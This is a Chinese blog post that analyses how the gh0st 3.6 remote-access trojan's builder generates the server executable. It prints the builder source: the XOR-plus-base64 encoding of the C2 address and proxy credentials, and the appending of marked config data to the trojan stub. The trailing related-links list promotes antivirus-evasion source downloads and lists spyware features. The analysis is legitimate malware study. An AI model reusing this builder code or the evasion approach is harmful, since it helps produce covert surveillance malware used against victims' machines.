gh0st3.6源码分析(1)——木马的生成

最新推荐文章于 2025-05-03 14:11:47 发布
最新推荐文章于 2025-05-03 14:11:47 发布
阅读量5k 收藏
点赞数
分类专栏: windows编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hjxyshell/article/details/19094609
版权


在分析木马程序时如何安装的之前,我们首先需要简单的了解下,木马程序时如何生成的。

我们知道,木马程序时作为资源文件被存储到主程序中的,生成木马的时候释放出来。

        

         那一些木马连接的配置信息是如何保存的呢?先看下面一个截图



上线字符串时时木马程序在连接客户端时必须的信息,保存着客户端地址相关信息。这段字符串时将客户端信息加密处理得来的。我们看下gh0st 中的

void CSettingsView::OnChangeConfig(UINT id)
{
	UpdateData();
	m_remote_host.Replace(" ", "");
	m_remote_port.Replace(" ", "");
	m_proxy_host.Replace(" ", "");
	m_proxy_port.Replace(" ", "");
	m_proxy_user.Replace(" ", "");
	m_proxy_pass.Replace(" ", "");

	CString str = m_remote_host + ":" + m_remote_port;

	if (m_bIsUsedProxy && m_proxy_host.GetLength() && m_proxy_port.GetLength())
	{
		str += "|" + m_proxy_host + ":" + m_proxy_port;
		if (m_bIsProxyAuth && m_proxy_user.GetLength() && m_proxy_pass.GetLength())
			str += "|" + m_proxy_user + ":" + m_proxy_pass;
	}
	str.MakeLower();
	m_encode = MyEncode(str.GetBuffer(0));
	m_encode.Insert(0, "AAAA");
	m_encode += "AAAA";
	UpdateData(FALSE);

	if (m_bIsSaveAsDefault)
	{
		((CGh0stApp *)AfxGetApp())->m_IniFile.SetString("Connection", "Host", m_remote_host);
		((CGh0stApp *)AfxGetApp())->m_IniFile.SetString("Connection", "Port", m_remote_port);
		((CGh0stApp *)AfxGetApp())->m_IniFile.SetString("Connection", "ProxyHost", m_proxy_host);
		((CGh0stApp *)AfxGetApp())->m_IniFile.SetString("Connection", "ProxyPort", m_proxy_port);
		((CGh0stApp *)AfxGetApp())->m_IniFile.SetString("Connection", "ProxyUser", m_proxy_user);
		((CGh0stApp *)AfxGetApp())->m_IniFile.SetString("Connection", "ProxyPass", m_proxy_pass);	
		((CGh0stApp *)AfxGetApp())->m_IniFile.SetInt("Connection", "UsedProxy", m_bIsUsedProxy);
		((CGh0stApp *)AfxGetApp())->m_IniFile.SetInt("Connection", "ProxyAuth", m_bIsProxyAuth);
	}
}

从函数分析可知,程序将ip地址端口port以ip:port的形式保存起来,(若其他信息的话使用‘|’连接起来),然后进行加密处理,再在加密后的字符串两边添加AAAA标志

看下加密函数如下:

char* MyEncode(char *str)
{
	int		i, len;
	char	*p;
	char	*s, *data;
	len = strlen(str) + 1;
	s = (char *)malloc(len);
	memcpy(s, str, len);
	for (i = 0; i < len; i++)
	{
		s[i] ^= 0x19;
		s[i] += 0x86;
	}
	base64_encode(s, len, &data);
	free(s);
	return data;
}

程序对字符串先逐个进行简单的异或相加,然后base64加密。

 

再看下生成界面的配置

http上线暂且不讲,生成程序在gh0st中BuildView中。

void CBuildView::OnBuild() 
{
	// TODO: Add your control notification handler code here
	UpdateData(true);
	if (m_ServiceDisplayName.IsEmpty() || m_ServiceDescription.IsEmpty())
	{
		AfxMessageBox("请完整填写服务显示名称和描述 -:(");
		return;
	}
	CString strAddress;

	// 保存配置
	((CGh0stApp *)AfxGetApp())->m_IniFile.SetString("Build", "DisplayName", m_ServiceDisplayName);
	((CGh0stApp *)AfxGetApp())->m_IniFile.SetString("Build", "Description", m_ServiceDescription);
	((CGh0stApp *)AfxGetApp())->m_IniFile.SetInt("Build", "enablehttp", m_enable_http);
	if (m_enable_http)
	{
		CString str;
		GetDlgItemText(IDC_URL, str);
		((CGh0stApp *)AfxGetApp())->m_IniFile.SetString("Build", "httpurl", str);
		str.MakeLower();
		strAddress = MyEncode(str.GetBuffer(0));
	}
	else
	{
		GetDlgItemText(IDC_DNS_STRING, strAddress);
		if (strAddress.Find("AAAA") == -1)
		{
			AfxMessageBox("域名上线字串格式出错 -:(");
			return;
		}
		strAddress.Replace("AAAA", "");
	}

	CString		strServiceConfig;
	strServiceConfig.Format("%s|%s", MyEncode(m_ServiceDisplayName.GetBuffer(0)), 
		MyEncode(m_ServiceDescription.GetBuffer(0)));

	CFileDialog dlg(FALSE, "exe", "server.exe", OFN_OVERWRITEPROMPT,"可执行文件|*.exe", NULL);
	if(dlg.DoModal () != IDOK)
		return;
	
	HINSTANCE	hInstance;
	HRSRC		hResInfo;
	DWORD		dwResLen;
	HGLOBAL		hResData;
	LPBYTE		lpData;
	hInstance = AfxGetApp()->m_hInstance;
	hResInfo = FindResource(hInstance, (LPCTSTR)IDR_BSS, (LPCTSTR)"BSS");
	dwResLen = SizeofResource(hInstance, hResInfo);
	hResData = LoadResource(hInstance, hResInfo);
	lpData = (LPBYTE)LockResource(hResData);

	CFile file;
	if(file.Open (dlg.GetPathName(), CFile::modeCreate | CFile::modeWrite))
	{
		try
		{
			file.Write(lpData, dwResLen);
			// 写入6个'C',是服务的名称和描述
			file.Write("CCCCCC", 6);
			file.Write(strServiceConfig, strServiceConfig.GetLength() + 1);
			// 写入6个'A',安装时查找
			file.Write("AAAAAA", 6);
			file.Write(strAddress, strAddress.GetLength() + 1);
			file.Close();
			AfxMessageBox("文件保存成功,请用加壳软件进行压缩 -:)");
		}
		catch(...)
		{
			MessageBox("文件保存失败,请检查","提示",MB_OK|MB_ICONSTOP);
		}
	}
	FreeResource(hResData);
}

通过函数可知,程序先判断改界面配置信息是否完整。保存服务名称servername和服务描述serverdescription,以及上线字符串。

然后将上线字符串的AAAA标志去掉。

将servername和serverdescription使用‘|’连接起来并调用函数MyEncode函数加密,将结果保存到strServiceConfig中。

 

将定位资源中木马程序的地址,并获的木马大小,将其写到另外一个文件,然后将服务名称和描述信息strServiceConfig,上线字符串写到程序的最后面,不过在写入时分别加入了识别标志,strServiceConfig前写了6个字节的C,上线字符串写了6个字节的A,然后保存文件。

 

我们看一些生成文件尾部的信息。



可知,客户端程序最后将连接信息保存到了木马程序的尾部

gh0st3.6源码
02-07
超经典的Gh0st源码,免杀必备,你值得拥有!
gh0st 3.6 C++ 源码版
03-15
说明:支持断点调试的C++远程控制 gh0st 3.6源码下载。已去除硬盘锁。源代码已经经过重建工程,修改配置后可以在VC++6.0中下断点进行调试,网上的原版代码及其他代码大多数不能下断点调试,不方便大多数入门者阅读代码、学习技术。   警告:源代码仅供学习,禁止用于非法用途! 运行环境:Windows/Visual C/C++
GH0ST3.75免杀远控源码介绍
最新发布
gitblog_06789的博客
05-03 629
GH0ST3.75免杀远控源码介绍 【下载地址】GH0ST3.75免杀远控源码介绍 GH0ST3.75是一款高效稳定的远控源码,经过社区优化,具备强大的功能和易用性。其核心特点包括免杀特性,能有效避开安全软件查杀;原版无壳无后门,确保使用安全;提供多种功能模式,满足多样化需求。本源码仅供合法范围内的技术研究与学习使用,严...
gh0st3.6源码编译+++免杀教程
qingruo_yin的专栏
05-06 4592
<br />这里有4个教程    可以去看看 <br /><br />gh0st3.6编译教程<br /><br />http://www.3800hk.com/donghua/f/24166.html<br /><br /><br /><br />vc++6.0对gh0st驱动免杀教程.rar<br />http://www.heibai.net/download/Soft/Soft_13829.htm<br /><br /><br /><br /><br /><br /><br />gh0st源代码修改
gh0st3.6_src红狼官方_源码
10-22
gh0st RAT是红狼小组出品的一款很优秀的远程控制软件。自从红狼上次公布了gh0st 2.5版本的源代码之后,就一直没开源了,这次更新的gh0st 3.6 又再次开源 Gh0st RAT C.Rufus Security Team http://www.wolfexp.net 控制端采用IOCP模型,数据传输采用zlib压缩方式 稳定快速,上线数量无上限,可同时控制上万台主机 控制端自动检测CPU使用率调整自己的工作线程, 稳定高效 宿主为svchost以系统服务启动,有远程守护线程,上线间隔为两分钟。 心跳包机制防止意外掉线.. 支持HTTP和DNS上线两种方式 自动恢复SSDT(这功能干什么,大家都知道,免杀自己做吧),安装本程序需要管理员权限 控制端279K,返朴归真的界面,生成的服务端无壳,106 K,EXE内的资源用UPX压缩, 可安装多个服务端 其它细节方面的功能大家自己去发现吧 功能: 文件管理 完全仿Radmin所写, 文件、文件夹批量上传、删除、下载、创建、重命名 屏幕监视 扫描算法速度最快可达到120帧/秒,差异算法适合网络极差的情况下传输,传输速度快,控制屏幕,发送Ctrl+Alt+Del,剪贴板操作,7种色彩显示方式,等...... 键盘记录 可记录中英文信息,离线记录(记录上限50M)功能 远程终端 一个简单shell 系统管理 进程管理,窗口管理,拨号上网密码获取 视频查看 查看远程摄像头,快照,录像,压缩等功能... 语音监听 监听远程语音,同时也可以把本地语音传送给远程,进行语音聊天,GSM610压缩方式,传输流畅 会话管理 注销,重启,关机,卸载服务端 其它功能 下载执行指定URL中的程序,隐藏或者显示访问指定网址,清除系统日志 地址位置 将IP数据库文件QQWry.Dat放置程序同目录下即可显示地理位置 集群控制 可同时控制多台主机,同时打开视频监控等管理功能 备注功能 .........
gh0st3.6源代码
07-15
其实这个东西 大家都懂 我去掉了大量的模块化 植入了汇编 免杀也更好做了.大家有兴趣的可以看看
gh0st3.6_src红狼官方_源码_远程_Gh0st_远程控制_
10-02
"gh0st3.6_src红狼官方_源码_远程_Gh0st_远程控制_"这个标题表明我们正在处理的是Gh0st远程控制软件的3.6版本的源代码。Gh0st是一款知名的远程控制工具,通常用于系统管理和维护,但也可能被滥用进行非法活动。"src...
红狼远控gh0st3.6版本的vs2010 vs2013 vs2015 vs2017
04-05
【红狼远控gh0st3.6版本的vs2010 vs2013 vs2015 vs2017】是一款远程控制软件的源码版本,适用于多种Visual Studio开发环境,包括Visual Studio 2010、2013、2015和2017。这个项目提供了深入理解远程控制软件开发的...
gh0st3.6_src.zip
09-03
《深入剖析gh0st3.6远程控制软件源码》 gh0st3.6,作为一款曾经在网络安全领域颇具影响力的远程控制软件,其源码的公开无疑为开发者提供了宝贵的教育资源。这款软件以其强大的功能和隐蔽性,在过去的一段时间内引起...
红狼gh0st 3.6版本源码
07-06
总结起来,红狼gh0st 3.6版本源码的分析是一个复杂而富有挑战性的任务,它不仅涵盖了软件工程的多个层面,也涉及到了信息安全领域的深度技术。对于有志于提升自身技能或进行安全研究的人来说,这是一个不可多得的...
Gh0st3.6红狼原版源码 Gh0st3.6红狼原版源码
09-21
Gh0st3.6红狼原版源码 Gh0st3.6红狼原版源码 Gh0st3.6红狼原版源码
gh0st 3.6源码 vs2010 编译成功版
05-27
gh0st 3.6源码 vs2010 编译成功版
gh0st3.6 VS2010编译通过
12-25
gh0st3.6源码包含VS2010编译配置、编译好的exe可直接运行
Gh0st 3.6 美化版
12-31
Gh0st 3.6 美化版 Gh0st 3.6 美化版 Gh0st 3.6 美化版 Gh0st 3.6 美化版 Gh0st 3.6 美化版 Gh0st 3.6 美化版
gh0st源码分析与远控的编写()
liujiayu2的专栏
05-28 3128
好久不见。距离上次写gh0st来有好久了,一是期末考试,忙不开,二是后来电脑坏了,几天没能上网。     昨天总算是把电脑修好了,虽说没到一切重头开始的地步,但是也重装各种东西花了很久。闲下来的时间,我就来继续分析gh0st的源码吧。     上次我们把gh0st的上线给研究了一下,跟着老狼的视频,继续我们的步伐。开始实现gh0st中具体的功能。最简单的一个是“终端管理”,就是一个cmdshe
Gh0st样本分析
qq_38184895的博客
10-24 592
Gh0st样本分析 ###一.样本信息 文件名称: DD668456CF2F3B72773D1968487BDCD5.exe 文件大小:110KB MD5: DD668456CF2F3B72773D1968487BDCD5 SHA-1: 4E6D34B68E219BE56D8A1C0DA5B7FB8ECCD282B9 ###二.样本分析 0x01. GetInputState()用于隐...
Gh0st 源码分析(一)
weixin_33690963的博客
12-29 4727
Gh0st 的编译与使用方法 相信很多人应该或多或少地听说过 gh0st 的大名,正如上面所说,它是一款远程控制软件,其原始版本的代码和作者已经无从考证,笔者手里这一份也来源于网络,我修正一些 bug 并作了一些优化,仅供个人学习研究,不可用于商业用途和任何非法用途,否则后果自负。 代码下载方式,微信扫描以下二维码关注【高性能服务器开发】公众号,关注后回复【gh0st】即可得到下载链接: 编译方...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值